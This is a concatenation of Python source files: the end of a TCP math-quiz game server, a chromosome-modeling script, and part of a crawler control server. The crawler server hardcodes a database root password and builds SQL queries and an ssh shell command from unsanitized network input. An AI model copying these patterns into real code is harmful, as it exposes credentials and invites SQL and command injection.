name_a = CONN_A.recv(MESSAGE_LENGTH).decode()
name_b = CONN_B.recv(MESSAGE_LENGTH).decode()
return name_a, name_b, True
except Exception as e:
print(Colors.GREEN + "group name was not entered so couldn't start the game")
send_message("group name was not entered so couldn't start the game")
return "", "", False
def send_message(message):
try:
CONN_A.sendall(message.encode())
CONN_B.sendall(message.encode())
except Exception as e:
pass
def receive_char(answer):
global CONN_A, CONN_B
a_won = False
got_answer = False
timeout = time.time() + TIME_TO_PLAY
while time.time() < timeout and not got_answer:
try:
data = CONN_A.recv(1024)
if int(data) == answer:
a_won = True
else:
a_won = False
got_answer = True
return a_won, got_answer
except Exception as e:
try:
data = CONN_B.recv(1024)
if int(data) == answer:
a_won = False
else:
a_won = True
got_answer = True
return a_won, got_answer
except Exception as e:
time.sleep(0.1)
return a_won, got_answer
def send_end_message(name_a, name_b, answer, a_won, got_answer):
if a_won:
winner_group = name_a
else:
winner_group = name_b
if got_answer:
end_message = "Game over!\nThe correct answer was " + str(
answer) + "!\nCongratulations to the winner:" + winner_group
else:
end_message = "Game over!\nNo one answered - Draw"
print(Colors.PINK + end_message)
send_message(end_message)
def send_math_question():
try:
math = ["2+3", "4-2", "9-3", "2*4", "1*5", "6/3", "8/4", "ln(e^3)"]
answerTable = [5, 2, 6, 8, 5, 2, 2, 3]
value = randint(0, 7)
send_message("How much is: " + math[value] + "?\n")
return answerTable[value]
except Exception as e:
pass
def start_game():
try:
time.sleep(TIME_UNTIL_GAME)
# part 1 - only thing that can stop a game, get group names
name_a, name_b, isValid = get_group_names()
if isValid:
# part 2 - send the openning message and random math question
begin_message = "Welcome to Quick Maths.\nPlayer 1: " + name_a + "\nPlayer 2: " + name_b + "\n====\n Please " \
"answer the " \
"following " \
"question as fast " \
"as you can:\n "
send_message(begin_message)
answer = send_math_question()
# part 3 - receive answer
a_won, got_answer = receive_char(answer)
# part 4 - declare the winner
send_end_message(name_a, name_b, answer, a_won, got_answer)
except Exception as e:
pass
def start_tcp():
global sockTCP
sockTCP = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # init the TCP socket
sockTCP.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sockTCP.bind(('', TCP_DEST_PORT))
sockTCP.listen(2)
def reset_params():
global counter
counter = 0
def main():
global counter
start_tcp()
while True:
try:
time.sleep(1) # not a must, but make sure clients can disconnect
# part 1 - broadcast
broadcaster = Thread(target=send_broadcast, args=())
# part 2 - wait for 2 clients to connect, wait indefinitely
client_connector = Thread(target=connect_clients, args=())
broadcaster.start()
client_connector.start()
# part 3 - make sure they finish before game starts
broadcaster.join()
client_connector.join()
# part 4 - play the game
start_game()
# part 5 - game ended, start anew
reset_params()
CONN_A.close()
CONN_B.close()
except Exception as e:
pass
print("Game over, sending out offer requests...")
if __name__ == "__main__":
main()
|
Astep_locus.py | #!/usr/bin/env python
##
# Copyright (C) 2016 University of Southern California and
# Nan Hua
#
# Authors: Nan Hua, Ke Gong, Harianto Tjong, and Hanjun Shin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#Assignment step for locus (non-haploid); Added by Harianto; June 2017
import re
import sys
import numpy as np
import alab.matrix
import alab.modeling
import multiprocessing
import os
import argparse
import json
__author__ = "Nan Hua"
__credits__ = ["Nan Hua","Ke Gong","Harianto Tjong", "Hanjun Shin"]
__license__ = "GPL"
__version__ = "0.0.1"
__email__ = "nhua@usc.edu"
#===========define functions
def readinCoordinates(copystart,copyend,lastfb,coor_shared,structdir,nstruct,nbead):
arr = np.frombuffer(coor_shared.get_obj())
modelcoor = arr.reshape((nstruct,nbead,3)) #e.g. 10000 * nbead* 3
for i in range(copystart,copyend):
try:
xyz,r = alab.modeling.readCoordinates(structdir+'/copy'+str(i)+'.hms',lastfb)
modelcoor[i][:] = xyz
except RuntimeError:
print "Can't find result for copy %s , %s" %(str(i),lastfb)
#--
def existingPortion(v, rsum):
return sum(v<=rsum)*1.0/len(v)
def cleanProbability(pij,pexist):
if pexist < 1:
pclean = (pij-pexist)/(1.0-pexist)
else:
pclean = pij
return max(0,pclean)
def calcActdist(jobqueue,fid,coor_shared,queue,probmat,nstruct,nbead,lastprob, r):
arr = np.frombuffer(coor_shared.get_obj())
modelcoor = arr.reshape((nstruct,nbead,3)) #10000 * nbead* 3
for job in jobqueue:
i = job[0]
j = job[1]
pwish = probmat.matrix[i,j]
plast = lastprob[i,j]
dists = np.linalg.norm(modelcoor[:,i,:] - modelcoor[:,j,:],axis=1) -r[i] - r[j] #L2 norm
sortdist = np.sort(dists)
pnow = existingPortion(sortdist,r[i]+r[j])
t = cleanProbability(pnow,plast)
p = cleanProbability(pwish,t)
if p>0:
o = min(nstruct-1, int(round(p*nstruct)))
res = '%4d %4d %5.3f %7.1f %5.3f %5.3f\n'%(i,j,pwish,sortdist[o],p,pnow)
queue.put(res)
return 0
def listener(queue,actFile):
fout=open(actFile,'w')
while True:
res = queue.get()
if res == 'kill':
break
fout.write(str(res))
fout.flush()
fout.close()
#===========end
#===================main entry========================
#def main(probfile,structdir,actFile,lastfb,currentfb,nstruct,pids,plastfile):
def main(input_config):
if not input_config.has_key('modeling_parameters') :
raise Exception('%s : Input config error, it does not have modeling_parameters' % os.path.name(__file__))
else :
if not input_config['modeling_parameters'].has_key('probMat') :
raise Exception('%s : Input config error, it does not have probMat' % os.path.name(__file__))
if not input_config['modeling_parameters'].has_key('struct_dir') :
raise Exception('%s : Input config error, it does not have struct_dir' % os.path.name(__file__))
if not input_config['modeling_parameters'].has_key('actDist') :
raise Exception('%s : Input config error, it does not have actDist' % os.path.name(__file__))
if not input_config['modeling_parameters'].has_key('last_theta') :
raise Exception('%s : Input config error, it does not have last_theta' % os.path.name(__file__))
if not input_config['modeling_parameters'].has_key('theta') :
raise Exception('%s : Input config error, it does not have theta' % os.path.name(__file__))
if not input_config['modeling_parameters'].has_key('num_of_structures') :
raise Exception('%s : Input config error, it does not have num_of_structures' % os.path.name(__file__))
if not input_config['modeling_parameters'].has_key('last_actDist') :
raise Exception('%s : Input config error, it does not have last_actDist' % os.path.name(__file__))
if not input_config['modeling_parameters'].has_key('pids') :
raise Exception('%s : Input config error, it does not have pids' % os.path.name(__file__))
probfile = str( input_config['modeling_parameters']['probMat'] )
structdir = str( input_config['modeling_parameters']['struct_dir'] )
actFile = str( input_config['modeling_parameters']['actDist'] )
lastfb = str( input_config['modeling_parameters']['last_theta'] )
currentfb = str( input_config['modeling_parameters']['theta'] )
nstruct = int( input_config['modeling_parameters']['num_of_structures'] )
pids = int( input_config['modeling_parameters']['pids'] )
plastfile = input_config['modeling_parameters']['last_actDist']
#################################
# parse arguments #
#################################
probmat = alab.matrix.contactmatrix(probfile)
nbead = len(probmat)
#targetfreq = float(re.search('\d+',currentfb).group(0))/100.
getnum = re.compile(r'[^\d.]+')
#targetfreq = float(getnum.sub('',currentfb))/100.
targetfreq = float(getnum.sub('',currentfb))
#################################
#read in structure conformation #
#################################
xyz,r = alab.modeling.readCoordinates(structdir+'/copy0.hms',lastfb)#tempread one file
coor_shared = multiprocessing.Array('d',nstruct*nbead*3) #10000 * nbead* 3
pid = 20
readpool = []
for k in range(pid):
start = k*(nstruct/pid)
end = (k+1)*(nstruct/pid)
process = multiprocessing.Process(target=readinCoordinates,args=(start,end,lastfb,coor_shared,structdir,nstruct,nbead))
process.start()
readpool.append(process)
for process in readpool:
process.join()
###############################
#read in last probability file#
###############################
lastprob = np.zeros((nbead,nbead))
if not (plastfile == None or plastfile == 'null'):
plastfile = str(plastfile)
lastinfo = np.genfromtxt(plastfile)
for i in range(len(lastinfo)):
lastprob[int(lastinfo[i,0]),int(lastinfo[i,1])] = lastinfo[i,4]
#-
#--
###############################
#calculate activation distance#
###############################
jobqueue = []
for i in range(pids):
jobqueue.append([])
q = 0
for i in range(nbead):
for j in range(i+1,nbead):
if probmat.matrix[i,j] >= targetfreq:
jobqueue[q].append((i,j))
q+= 1
if q >= pids:
q = 0
#-
# skip those low frequency entries
#--
#--
record = []
manager = multiprocessing.Manager()
q = manager.Queue()
watcher = multiprocessing.Process(target=listener,args=(q,actFile))
watcher.start()
for i in range(pids):
process = multiprocessing.Process(target = calcActdist,args=(jobqueue[i],i,coor_shared,q,probmat,nstruct,nbead, lastprob,r))
process.start()
record.append(process)
for process in record:
process.join()
q.put('kill')
watcher.join()
return 0
#=======================/main entry/===================
if __name__ == "__main__":
# parser.add_argument('--probfile', type=str, required=True) #probility matrix file in contactmatrix format <input>
# parser.add_argument('--structdir', type=str, required=True) #xxx/structures/model*/ <input>
# parser.add_argument('--actFile', type=str, required=True) #activation distance file, <output>
# parser.add_argument('--lastfb', type=str, required=True) #last theta <parameter>
# parser.add_argument('--currentfb', type=str, required=True) #current theta <parameter>
# parser.add_argument('--nstruct', type=int, required=True) #number of structures <parameter>
# parser.add_argument('--pids', type=int, required=False, default=8) #number of processers to use <setup>
# parser.add_argument('--plastfile', type=str, required=False, default=None)#last activation distance file <optional input>
#main(args.probfile, args.structdir, args.actFile, args.lastfb, args.currentfb, args.nstruct, int(args.pids), args.plastfile)
#parser = argparse.ArgumentParser(description="AStep.py")
#parser.add_argument('--input_config', type=str, required=True)
#args = parser.parse_args()
#main(args.input_config)
data = json.loads( sys.argv[1] )
main(data)
|
server.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import threading
import SocketServer
import re
import json
import signal
import random
import pymysql
import mysql.connector
import MySQLdb
import urllib2
from crawler import Crawler
from pymongo import MongoClient
from time import sleep
from kazoo.client import KazooClient
import os
# reload sys in order to deal with char set
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# start ZooKeeper Cluster
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
zk = KazooClient(hosts = hosts_list)
zk.start()
# try to use many kinds of MySQL Client to kill the fu*king BUG
#db2 = pymysql.connect(host="localhost",user="root",passwd="765885195",db="HP",charset="utf8")
#db2 = mysql.connector.connect(user="root", passwd="765885195", database="HP", use_unicode=True)
#db2 = MySQLdb.connect("localhost", "root", "765885195", "HP")
db1 = MySQLdb.connect(host="localhost",user="root",passwd="765885195",db="HP",charset="utf8")
db2 = MySQLdb.connect(host="localhost",user="root",passwd="765885195",db="HP",charset="utf8")
instant_data = ["35"]
# 支持的网站信息
info = {'0':['www.taobao.com','1'],#
'1':['www.tmall.com','1'],
'2':['www.jd.com','1'],
'3':['www.cnblogs.com','2'],
'4':['blog.csdn.net','2'],
'5':['blog.sina.com.cn','2'],
'6':['blog.51cto.com','2'],
'7':['www.chinanews.com','3'],
'8':['www.chinadaily.com.cn','3'],
'9':['www.eastday.com','3'],
'10':['www.huanqiu.com','3'],
'11':['news.sina.com.cn','3'],
}
info_zk = {'0':['taobao','1'], #
'1':['tmall','1'], #
'2':['jingdong','1'],
'3':['cnblog','2'],
'4':['csdnblog','2'], #
'5':['sinablog','2'],
'6':['ctoblog','2'],
'7':['chinanews','3'],
'8':['chinadaily','3'],
'9':['eastnews','3'],
'10':['huanqiunews','3'],
'11':['sinanews','3'], #
}
state_map = {"5":"continue", "8":"pause", "13":"stop"}
node_map = {}
# MongoDB handle (Mongodb连接句柄)
mdb = []
# 展示数据
show_data = []
def Saveto_mysql():
ip_list = []
sql = "select * from info"
try:
cur = db1.cursor()
cur.execute(sql)
db1.commit()
result = cur.fetchall()
for field in result:
ip_list.append(field[1])
del result
cur.close()
print ip_list
except Exception, e:
print "Error: %s" % e
num = len(mdb)
for i in range(num):
tip = ip_list[i].split('.')
db_name = ""
for t in tip:
db_name += t
ip_list[i] = MongoClient(ip_list[i], 27017)
mdb.append(ip_list[i][db_name])
while True:
num = len(mdb)
collections = []
tsql = "select url,keywords,genre from task group by url,keywords,genre"
try:
cur = db1.cursor()
cur.execute(tsql)
db1.commit()
result = cur.fetchall()
for task in result:
print '任务: ', task[0], task[1]
li = []
li.append(task[0])
li.append(task[1])
li.append(task[2])
collections.append(li)
print '当前collection: ', collections
del result
cur.close()
except Exception, e:
print "HP said Error: %s" % e
#sys.exit(0)
print '总collections: ', collections
for i in range(len(collections)):
sum = 0
coll_name = info[collections[i][0]][0]
print '当前任务链接: ', coll_name
if coll_name == 'blog.51cto.com':
coll_name = 'ctoblog'
keywords = collections[i][1]
genre = collections[i][2]
if not keywords:
for j in range(num):
try:
sum += mdb[j][coll_name].count()
except Exception,e:
pass
else:
for j in range(num):
sum += mdb[j][keywords].count()
str_sql = "insert into amount values('"+str(collections[i][0])+"', '"+str(keywords)+"', "+str(sum)+", '"+str(genre)+"', now())"
print str_sql
try:
cur = db1.cursor()
cur.execute(str_sql)
db1.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "Error: %s" % e
sleep(10)
def drop_data(url, keywords):
coll_name = info[url][0]
if not keywords:
print coll_name
print mdb
for client in mdb:
client[coll_name].remove({})
else:
for client in mdb:
client[keywords].remove({})
def send_data(url, keywords):
data_num = []
num = len(mdb)
coll_name = info[url][0]
genre = info[url][1]
# 找出爬取数据最多的机子
for i in xrange(num):
data_num.append(mdb[i][coll_name].count())
max_num = max(data_num)
client = mdb[data_num.index(max_num)]
# 随机选取数据
if max_num > 100:
random_num = random.randint(0, max_num-100)
else:
random_num = 0
if not keywords:
coll = client[coll_name]
else:
coll = client[keywords]
print 'genre: ', genre
# 电商
if genre == '1':
print "正在获取电商数据......"
# 在爬取数据最多的机子上获取指定数目的数据
result = coll.find().skip(random_num).limit(30)
for res in result:
show_data.append(res['link'])
show_data.append(res['title'])
show_data.append(res['price'])
show_data.append(res['shop'])
show_data.append(res['shopLink'])
try:
compositeScore = str((float(res['serviceScore'])+float(res['describeScore'])+float(res['logisticsScore']))/3)[:3]
except Exception, e:
compositeScore = '尚未收到评价'
show_data.append(compositeScore)
else:
# 在爬取数据最多的机子上获取指定数目的数据
print 'i am here'
print coll
result = coll.find().skip(random_num).limit(4)
for res in result:
tdata = "原文链接: " + res['url'] + "\n\n标题: " + res['title'].strip() + "\n\n发布时间: " + res['releaseTime'] + "\n\n类别: " + str(res['sort']) + "\n\n标签: " + str(res['tags']) + "\n\n阅读人数: " + str(res['readnum']) + "\n\n正文: \n\n" + str(res['article']).strip() + "\n\n"
show_data.append(tdata)
show_data.extend(['','','','',''])
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def get_ready_node(self, priority):
ready_list = []
for i in range(priority):
task_num_max = 9999
for node in node_map:
if node_map[node][1] == '21' and node_map[node][2] < task_num_max and node not in ready_list:
obj_node = node
task_num_max = node_map[node][2]
ready_list.append(obj_node)
return ready_list
def handle(self):
print self.request.getpeername()
while True:
try:
data = self.request.recv(1024)
print data
jdata = json.loads(data)
except Exception, e:
print "正在等待主控发来指令...."
break
# request to show working job
# 请求正在运行任务
#url+ '' ['1']
if jdata[0]['Agreement'] == '1':
print 'mt请求正在运行任务....'
task = ['1']
sql = "select * from task where status='5' or status='8'"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for res in result:
task.append(res[0])
task.append(res[1])
task.append(res[2])
task.append(res[3])
task.append(res[4].strftime("%Y-%m-%d %H:%M:%S"))
task.append(res[5])
print "$$$"
print task
del result
cur.close()
except Exception, e:
print "get working task SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get working task Send error: %s" % e
# request tp show all job(include history job)
# 获取所有任务
elif jdata[0]['Agreement'] == '2':
print 'mt请求所有任务....'
task = ['2']
sql = "select * from task"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
task.append(field[0])
task.append(field[1])
del result
cur.close()
except Exception, e:
print "get all task SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get all task Send error: %s" % e
# request to show end job
# 获取终止任务
elif jdata[0]['Agreement'] == '3':
print 'mt请求所有任务....'
task = ['3']
sql = "select * from task where status='13'"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
task.append(field[0])
task.append(field[2])
del result
cur.close()
except Exception, e:
print "get end task SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get end task Send Error: %s" % e
# request to start a job (multi URL)
# 混合url任务请求
elif jdata[0]['Agreement'] == '4':
urls = jdata[0]['Content'].split(', ')
print 'urls', urls
priority = int(urls[len(urls)-1])
for i in range(len(urls)-1):
url = str(urls[i])
task_type = info_zk[url][0]
ready_list = self.get_ready_node(priority)
for j in range(priority):
print ready_list[j] + "&&&"
zk.set("/command/" + ready_list[j], value = task_type)
node_map[ready_list[j]][2] += 1 # task_num++
temp_list = zk.get_children("/signal/" + task_type)
for i in temp_list:
zk.delete('/signal/' + task_type + '/' +str(i))
zk.create("/signal/" + task_type + '/start')
for ready_node in ready_list:
sql = "insert into task values('"+url+"','','"+info[url][1]+"',"+ready_node+",now(),'5')"
nsql = "update info set tasknum=tasknum+1 where id='" + ready_node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
except Exception, e:
sql = "update task set status='5' where url='" + url + "' and keywords=''"
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
try:
cur = db2.cursor()
cur.execute(nsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "start task(multi) SQL Error: %s" % e
# 发布任务后在amount表中插入20条空数据,防止出现时间倒序
tsql = "insert into amount values('"+url+"','',0,'"+info[url][1]+"',now())"
for i in range(20):
try:
cur = db2.cursor()
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print 'insert amount(indistinct) execute error: ', e
print priority
print type(priority)
try:
self.request.sendall(json.dumps(["4","0"]))
except Exception, e:
self.request.sendall(json.dumps(["4","-1"]))
print "start task(multi) Send error: %s" % e
# request to start a single URL job
# 发布精确任务
elif jdata[0]['Agreement'] == '5':
urls = jdata[0]['Content'].split(', ')
print 'urls', urls
url = str(urls[0])
keyword = urls[1]
priority = int(urls[2])
task_type = (info_zk[url][0] + '_' + keyword).decode("utf-8")
ready_list = self.get_ready_node(priority)
for i in range(priority):
zk.set("/command/" + ready_list[i], value = task_type.encode("utf-8"))
node_map[ready_list[i]][2] += 1 # task_num++
if zk.exists("/signal/" + task_type) != None:
temp_list = zk.get_children("/signal/" + task_type)
for i in temp_list:
zk.delete('/signal/' + task_type + '/' +str(i))
else:
zk.create("/signal/" + task_type)
zk.create("/signal/" + task_type + '/start')
for ready_node in ready_list:
print type(keyword)
sql = "insert into task values('"+url+"', '"+keyword+"','"+info[url][1]+"',"+str(ready_node)+",now(),'5')"
nsql = "update info set tasknum=tasknum+1 where id='" + ready_node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
sql = "update task set status='5' where url='" + url + "' and keywords='" + keyword + "'"
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
try:
cur = db2.cursor()
cur.execute(nsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "start task(acc) SQL Error: %s" % e
# 发布任务后在amount表中插入20条空数据,防止出现时间倒序
tsql = "insert into amount values('"+url+"','"+ keyword+"',0,'"+info[url][1]+"',now())"
for i in range(20):
try:
cur = db2.cursor()
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print 'insert amount(accurate) execute error: ', e
try:
self.request.sendall(json.dumps(["5","0"]))
except Exception, e:
self.request.sendall(json.dumps(["5","-1"]))
print "start task(acc) Send error: %s" % e
# request to start a job instantly
# 发布即时任务
elif jdata[0]['Agreement'] == '8':
del instant_data[:]
instant_data.append('35')
try:
self.request.sendall(json.dumps(["8","0"]))
except Exception, e:
self.request.sendall(json.dumps(["8","-1"]))
print "start im task Send error: %s" % e
try:
urls = jdata[0]['Content'].split(', ')
for url in urls:
if not url.startswith('http'):
url = "http://" + url
if url.endswith('com') or url.endswith('net'):
url = url + "/"
crawl = Crawler(url)
if re.search('taobao|jiyoujia', url):
instant_data.append(url)
instant_data.append("1")
instant_data.append(str(crawl.spider_taobao()))
elif re.search('tmall', url):
instant_data.append(url)
instant_data.append("1")
instant_data.append(str(crawl.spider_tmall()))
elif re.search('jd.com', url):
instant_data.append(url)
instant_data.append("1")
instant_data.append(str(crawl.spider_jingdong()))
elif re.search('blog.sina', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_sinablog())
elif re.search('csdn', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_csdnblog())
elif re.search('news.sina', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_sinanews())
elif re.search('chinanews', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_chinanews())
else:
try:
urllib2.urlopen(url).read()
except Exception:
instant_data.append(url)
instant_data.append("0")
instant_data.append("链接有误,请检查后重新输入!!!")
else:
instant_data.append(url)
instant_data.append("0")
instant_data.append("目前不支持!!!")
print instant_data
except Exception, e:
print "start im task Error: %s" % e
# change job state(pause, continue,)
# 修改任务状态
elif jdata[0]['Agreement'] == '9':
obj_list = []
data = jdata[0]['Content'].split(',')
sql = "select id from task where url='" + data[0] + "' and keywords='" + data[1] + "'"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
obj_list.append("%010d" % field[0])
del result
cur.close()
except Exception, e:
print "change task state SQL(select) Error: %s" % e
task_state = state_map[str(data[2])]
task_type = info_zk[str(data[0])][0]
task_keyword = str(data[1])
if task_keyword != '':
task_type = task_type + '_' + task_keyword
print task_type
temp_list = zk.get_children("/signal/" + task_type)
for i in temp_list:
zk.delete('/signal/' + task_type + '/' +str(i))
zk.create('/signal/' + task_type + '/' + task_state)
if task_state == "stop":
sql = "update task set status='13' where url='" + data[0] + "' and keywords='" + data[1] + "'"
#sql = "delete from task where url='" + data[0] + "' and keywords='" + data[1] + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "change task state SQL(delete) Error: %s" % e
for obj_node in obj_list:
if node_map[obj_node][2] > 0:
node_map[obj_node][2] -= 1
else:
node_map[obj_node][2] = 0
nsql = "update info set tasknum=" + str(node_map[obj_node][2]) + " where id='" + obj_node + "'"
try:
cur = db2.cursor()
cur.execute(nsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "change task state SQL(tasknum--) Error: %s" % e
sql = "update task set status = '"+str(data[2])+"' where url='"+str(data[0])+"' and keywords='" + str(data[1]) + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "change task state SQL(update) Error: %s" % e
try:
self.request.sendall(json.dumps(["9","0"]))
except Exception, e:
self.request.sendall(json.dumps(["9","-1"]))
print "change task state Send error: %s" % e
# request to show jobs and down nums
# 获取任务及下载总数
elif jdata[0]['Agreement'] == '13':
print 'mt请求任务及下载总数....'
task = ['13']
sql = "select url,keywords,max(total) from amount group by url,keywords"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
task.append(field[0])
task.append(field[1])
task.append(field[2])
del result
cur.close()
except Exception, e:
print "get task amount SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get task amount Send error: %s" % e
# request to show data log
# 查看数据日志
elif jdata[0]['Agreement'] == '21':
print '正在查看数据日志'
log = ['21']
data = jdata[0]['Content'].split(', ')
#tsql = "select count(1) from amount"
#cur = db2.cursor()
#cur.execute(tsql)
#num = cur.fetchall()[0][0]
#if num < 10:
# sql = "select * from amount where url='" + str(data[0]) + "' and keywords='" + str(data[1]) + "'"
#else:
#sql = "select * from amount where time in (select time from (select * from amount where url='"+str(data[0])+"' and keywords='"+str(data[1])+"' order by time desc limit 10) as tp)"
sql = "select * from amount where url='"+str(data[0])+"' and keywords='"+str(data[1])+"' order by time desc limit 10"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
log.append(field[2])
#log.append(field[4].strftime("%m/%d %H:%M:%S"))
log.append(field[4].strftime("%H:%M:%S"))
print log
del result
cur.close()
except Exception, e:
print "get log SQL Error: %s" % e
try:
self.request.sendall(json.dumps(log))
except Exception, e:
print "get log Send error: %s" % e
# request to show history job down nums
# 获取任务下载总数
elif jdata[0]['Agreement'] == '34':
print 'mt请求历史任务下载总数....'
task = ['34']
esql = "select sum(total) from (select url,keywords,genre,max(total) as total from amount where genre='1' group by url,keywords,genre) as tp"
bsql = "select sum(total) from (select url,keywords,genre,max(total) as total from amount where genre='2' group by url,keywords,genre) as tp"
nsql = "select sum(total) from (select url,keywords,genre,max(total) as total from amount where genre='3' group by url,keywords,genre) as tp"
print esql
print bsql
print nsql
try:
cur = db2.cursor()
cur.execute(esql)
db2.commit()
result_esum = cur.fetchall()
cur.execute(bsql)
db2.commit()
result_bsum = cur.fetchall()
cur.execute(nsql)
db2.commit()
result_nsum = cur.fetchall()
if result_esum[0][0] is None:
task.append(0)
else:
task.append(int(result_esum[0][0]))
if result_bsum[0][0] is None:
task.append(0)
else:
task.append(int(result_bsum[0][0]))
if result_nsum[0][0] is None:
task.append(0)
else:
task.append(int(result_nsum[0][0]))
print task
del result_esum
del result_bsum
del result_nsum
cur.close()
except Exception, e:
print "get down data sql Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get down data Send error: %s" % e
# 发送即时任务数据
elif jdata[0]['Agreement'] == '35':
try:
if not instant_data:
self.request.sendall(json.dumps(['35']))
else:
self.request.sendall(json.dumps(instant_data))
except Exception, e:
print "send im dataSend error: %s" % e
# 数据展示
elif jdata[0]['Agreement'] == '36':
data = jdata[0]["Content"].split(', ')
del show_data[:]
print data
show_data.append('36')
t = threading.Thread(target=send_data, args=(data[0], data[1]))
t.start()
sleep(3)
try:
self.request.sendall(json.dumps(show_data))
except Exception, e:
print "send show_data error: %s" % e
elif jdata[0]['Agreement'] == '55': # refresh node state
print 'mt请求从机资源....'
resource_info = ['55']
for node in node_map:
if zk.exists("/command/" + node) != None:
node_map[node][1] = '21' # alive-working
sql = "update info set status='21' where id='" + node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "refresh node SQL Error: %s" % e
elif node_map[node][1] == '21':
node_map[node][1] = '34' # dead
sql = "update info set status='34' where id='" + node + "'"
tsql = "update info set tasknum=0 where id='" + node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
result = cur.fetchall()
del result
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "refresh node SQL Error: %s" % e
resource_info.append(node)
resource_info.append(node_map[node][0])
resource_info.append(node_map[node][1])
resource_info.append(node_map[node][2])
try:
print resource_info
print json.dumps(resource_info)
self.request.sendall(json.dumps(resource_info))
except Exception, e:
print "refresh node Send error: %s" % e
elif jdata[0]['Agreement'] == '56': # change node state
data = jdata[0]["Content"].split(',')
sql = "update info set status = '" + data[1] + "' where id = '" + data[0] + "'"
tsql = "update task set status='13' where id='" + data[0] + "'"
#tsql = "delete from task where id='" + data[0] + "'"
if data[1] == '55': # stop a node
zk.set("/command/" + data[0], value = "stop")
zk.delete("/command/" + data[0])
node_map[data[0]][1] = '34' # node is over
node_map[data[0]][2] = 0
else: # start a node
obj_ip = node_map[data[0]][0]
print "^^^^" + data[0]
cmd = "ssh root@{} 'python /root/V3/project/run.py {} 1>log' &".format(obj_ip, "%010d" % int(data[0]))
os.system(cmd)
node_map[data[0]][1] = '21' # node is working
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "Change node state: %s" % e
try:
self.request.sendall(json.dumps(["56","0"]))
except Exception, e:
self.request.sendall(json.dumps(["56","-1"]))
print "Change node Send error: %s" % e
elif jdata[0]['Agreement'] == '57': # delete / add a node
data = jdata[0]["Content"].split(',')
ip = data[1]
if data[0] == "0": # delete a node
sql = "delete from info where id = '" + data[1] + "'"
# tsql = "update task set status='13' where id='" + data[1] + "'"
node_map.pop(data[1])
try:
cur = db2.cursor()
cur.execute(sql)
#cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "delete SQL Error: %s" % e
elif data[0] == "1":
# 将Mongodb2连接句柄追加到全局列表中
tip = ip.split('.')
db_name = ""
for t in tip:
db_name += t
client = MongoClient(ip, 27017)
mdb.append(client[db_name])
sql = "insert into info values(null,'" + data[1] + "','55',0)"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "add SQL Error: %s" % e
tsql = "select max(id) from info"
try:
cur = db2.cursor()
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
cur.close()
except Exception, e:
print "add-query node: %s" % e
node_name = "%010d" % result[0][0]
node_map[node_name] = list((ip, '55', 0))
del result
try:
self.request.sendall(json.dumps(["57","0"]))
except Exception, e:
